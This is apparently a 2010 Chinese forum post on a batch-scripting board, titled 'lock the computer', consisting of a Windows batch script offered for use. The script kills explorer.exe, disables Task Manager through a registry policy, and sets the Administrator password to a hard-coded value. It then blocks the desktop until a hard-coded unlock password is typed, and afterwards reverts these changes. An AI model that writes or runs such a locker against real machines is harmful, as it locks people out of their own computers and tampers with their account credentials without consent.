锁定电脑
bat吧
全部回复
仅看楼主
level 12
Kyra 楼主
@echo off
echo exit |%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_ |debug >nul
chcp 936>nul
graftabl 936 >nul
taskkill /im explorer.exe /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
net user administrator "dsgsdf8654868"
:88
cls
ECHO 输入密码
set choice=
set /p choice=
if /I "%choice%"=="longsi712~~" goto start
echo 密码错误!
pause >nul
goto 88
:start
cls
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
start explorer.exe
net user administrator ""
2010年12月12日 08点12分 1
1